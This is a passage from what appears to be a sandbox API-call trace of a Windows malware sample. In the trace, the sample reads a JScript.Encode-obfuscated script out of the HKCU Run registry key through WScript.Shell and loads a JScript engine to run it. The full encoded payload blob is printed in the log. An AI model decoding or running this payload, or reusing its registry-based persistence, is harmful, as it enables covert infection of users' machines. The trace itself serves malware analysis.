[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ee70 | out: ppvObject=0x18ee70*=0x0) returned 0x80004002 [0037.852] IUnknown:AddRef (This=0x2cbce0) returned 0x2 [0037.852] IUnknown:AddRef (This=0x36ab70) returned 0x2 [0037.852] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.852] GetTickCount () returned 0x11a14 [0037.852] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eff0 | out: ppv=0x18eff0*=0x36ab70) returned 0x0 [0037.852] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.852] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18eff0 | out: ppv=0x18eff0*=0x36ab70) returned 0x0 [0037.852] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.853] GetCurrentThreadId () returned 0xa40 [0037.856] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f138 | out: ppv=0x18f138*=0x36ab70) returned 0x0 [0037.856] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.856] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f188 | out: ppv=0x18f188*=0x36ab70) returned 0x0 [0037.856] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.856] ISystemDebugEventFire:IsActive (This=0x3a56e0) returned 0x1 [0037.856] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f128 | out: ppv=0x18f128*=0x36ab70) returned 0x0 [0037.856] IUnknown:Release (This=0x36ab70) returned 0x1 [0037.856] GetCurrentThreadId () returned 0xa40 [0037.857] GetCurrentThreadId () returned 0xa40 [0037.864] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe830000 [0037.864] GetProcAddress (hModule=0x7fefe830000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe84a4c4 [0037.864] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18d1c0 | out: lpclsid=0x18d1c0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0037.865] SysStringLen (param_1=0x0) returned 0x0 [0037.865] GetProcAddress (hModule=0x7fefe830000, lpProcName="CoGetClassObject") returned 0x7fefe862e18 [0037.865] CoGetClassObject (in: rclsid=0x18d1c0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef3c66300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18d190 | out: ppv=0x18d190*=0x2cdf80) returned 0x0 [0038.511] WshShell:IUnknown:QueryInterface (in: This=0x2cdf80, riid=0x7fef3c66310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18d198 | out: ppvObject=0x18d198*=0x0) returned 0x80004002 [0038.511] WshShell:IClassFactory:CreateInstance (in: This=0x2cdf80, pUnkOuter=0x0, riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d180 | out: ppvObject=0x18d180*=0x2cdfc8) returned 0x0 [0038.511] WshShell:IUnknown:Release (This=0x2cdf80) returned 0x0 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c66320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18d160 | out: ppvObject=0x18d160*=0x0) returned 0x80004002 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18d138 | out: ppvObject=0x18d138*=0x0) returned 0x80004002 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18d0b0 | out: ppvObject=0x18d0b0*=0x0) returned 0x80004002 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18d0b8 | out: ppvObject=0x18d0b8*=0x0) returned 0x80004002 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c66508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18d0c0 | out: ppvObject=0x18d0c0*=0x0) returned 0x80004002 [0038.511] IUnknown:QueryInterface (in: This=0x2cdfc8, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d0c8 | out: ppvObject=0x18d0c8*=0x2cdfa0) returned 0x0 [0038.511] IUnknown:Release (This=0x2cdfc8) returned 0x1 [0038.511] IDispatch:GetIDsOfNames (in: This=0x2cdfa0, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18d460*="RegRead", cNames=0x1, lcid=0x409, rgDispId=0x18d310 | out: rgDispId=0x18d310*=2000) returned 0x0 [0038.517] IUnknown:AddRef (This=0x2cdfa0) returned 0x2 [0038.517] IDispatch:Invoke (in: This=0x2cdfa0, dispIdMember=2000, riid=0x7fef3c66360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x18d1f8*(rgvarg=([0]=0x18d210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HKCU\\software\\microsoft\\windows\\currentversion\\run\\", varVal2=0x2cd960)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18d738, pExcepInfo=0x18d1a0, puArgErr=0x18d194 | out: pDispParams=0x18d1f8*(rgvarg=([0]=0x18d210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HKCU\\software\\microsoft\\windows\\currentversion\\run\\", varVal2=0x2cd960)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x18d738*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", varVal2=0x0), pExcepInfo=0x18d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18d194*=0x0) returned 0x0 [0038.519] IUnknown:Release (This=0x2cdfa0) returned 0x1 [0038.600] DllGetClassObject (in: rclsid=0x376410*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7fefe9b6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c6b8 | out: ppv=0x18c6b8*=0x2ce030) returned 0x0 [0038.600] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x2ce030, pUnkOuter=0x0, riid=0x7fef34147a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18c708 | out: ppvObject=0x18c708*=0x2cd250) returned 0x0 [0038.600] GetUserDefaultLCID () returned 0x409 [0038.600] GetACP () returned 0x4e4 [0038.600] JScriptEngine5:IUnknown:Release (This=0x2ce030) returned 0x0 [0038.600] IUnknown:QueryInterface (in: This=0x2cd250, riid=0x7fef34147b0*(Data1=0xc7ef7658, Data2=0xe1ee, Data3=0x480e, Data4=([0]=0x97, [1]=0xea, [2]=0xd5, [3]=0x2c, [4]=0xb4, [5]=0xd7, [6]=0x6d, [7]=0x17)), ppvObject=0x18c9f8 | out: ppvObject=0x18c9f8*=0x2cd258) returned 0x0 [0038.600] IUnknown:AddRef (This=0x2cd250) returned 0x3 [0038.600] IUnknown:AddRef (This=0x2cd258) returned 0x4 [0038.600] IUnknown:QueryInterface (in: This=0x2cd250, riid=0x7fef34147f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c800 | out: ppvObject=0x18c800*=0x2cd260) returned 0x0 [0038.600] IActiveScriptProperty:SetProperty (This=0x2cd260, dwProperty=0x70000001, pvarIndex=0x0, pvarValue=0x18c7d0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x80004001 [0038.600] IUnknown:Release (This=0x2cd260) returned 0x4 [0038.600] IActiveScriptParse64:InitNew (This=0x2cd258) returned 0x0 [0038.600] IActiveScript:SetScriptSite (This=0x2cd250, pass=0x3bfb50) returned 0x0 [0038.600] GetCurrentThreadId () returned 0xa40 [0038.601] IUnknown:QueryInterface (in: This=0x3bfb50, riid=0x7fef3c65d38*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x2ce978 | out: ppvObject=0x2ce978*=0x3bfb70) returned 0x0 [0038.601] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18c6f0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0038.601] IUnknown:AddRef (This=0x3bfb50) returned 0x3 [0038.601] IActiveScriptSite:GetLCID (in: This=0x3bfb50, plcid=0x18c808 | out: plcid=0x18c808*=0x409) returned 0x0 [0038.601] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0038.601] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18c790, cchData=6 | out: lpLCData="1252") returned 5 [0038.601] IsValidCodePage (CodePage=0x4e4) returned 1 [0038.601] IActiveScriptSite:OnScriptTerminate (This=0x3bfb50, pvarResult=0x5, pexcepinfo=0x20) returned 0x0 [0038.601] IUnknown:QueryInterface (in: This=0x3bfb50, riid=0x7fef3c65dc8*(Data1=0xd6b96b0a, Data2=0x7463, Data3=0x402c, Data4=([0]=0x92, [1]=0xac, [2]=0x89, [3]=0x98, [4]=0x42, [5]=0x26, [6]=0x94, [7]=0x2f)), ppvObject=0x2cd530 | out: ppvObject=0x2cd530*=0x3bfb60) returned 0x0 [0038.601] IActiveScriptSiteDebug64:GetApplication (in: This=0x3bfb60, ppda=0x2cd540 | out: ppda=0x2cd540*=0x0) returned 0x8000ffff [0038.601] CoCreateInstance (in: rclsid=0x7fef3c65d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef3c65d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2cd5c0 | out: ppv=0x2cd5c0*=0x3a5590) returned 0x0 [0038.601] IUnknown:AddRef (This=0x3a5590) returned 0x2 [0038.601] GetCurrentProcessId () returned 0xa3c [0038.601] GetCurrentThreadId () returned 0xa40 [0038.601] GetTickCount () returned 0x11aef [0038.601] ISystemDebugEventFire:BeginSession (This=0x3a5590, guidSourceID=0x7fef3c65da8, strSessionName="JScript:00002620:00002624:18072431") returned 0x0 [0038.601] IActiveScript:GetScriptState (in: This=0x2cd250, pssState=0x18c820 | out: pssState=0x18c820*=5) returned 0x0 [0038.601] IActiveScript:SetScriptState (This=0x2cd250, ss=1) returned 0x0 [0038.601] IActiveScriptSite:OnScriptTerminate (This=0x3bfb50, pvarResult=0x1, pexcepinfo=0x0) returned 0x0 [0038.601] IActiveScript:AddNamedItem (This=0x2cd250, pstrName="window", dwFlags=0xe) returned 0x0 [0038.601] GetCurrentThreadId () returned 0xa40 [0038.601] IActiveScriptSite:GetItemInfo (in: This=0x3bfb50, pstrName="window", dwReturnMask=0x1, ppiunkItem=0x18c6d0, ppti=0x0 | out: ppiunkItem=0x18c6d0*=0x3971e0, ppti=0x0) returned 0x0 [0038.601] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c7c8 | out: ppvObject=0x18c7c8*=0x3971e0) returned 0x0 [0038.601] IUnknown:Release (This=0x3971e0) returned 0x6 [0038.601] IUnknown:AddRef (This=0x3971e0) returned 0x7 [0038.601] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c748 | out: ppvObject=0x18c748*=0x0) returned 0x80004002 [0038.601] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c6c0 | out: ppvObject=0x18c6c0*=0x0) returned 0x80004002 [0038.601] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c6c8 | out: ppvObject=0x18c6c8*=0x3971e0) returned 0x0 [0038.601] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c730 | out: ppv=0x18c730*=0x36ab70) returned 0x0 [0038.602] IUnknown:Release (This=0x36ab70) returned 0x1 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c708 | out: ppvObject=0x18c708*=0x0) returned 0x80004002 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c66518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c680 | out: ppvObject=0x18c680*=0x0) returned 0x80004002 [0038.602] IUnknown:QueryInterface (in: This=0x3971e0, riid=0x7fef3c664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c688 | out: ppvObject=0x18c688*=0x3971e0) returned 0x0 [0038.602] CoGetObjectContext (in: riid=0x7fef3c66350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c6f0 | out: ppv=0x18c6f0*=0x36ab70) returned 0x0 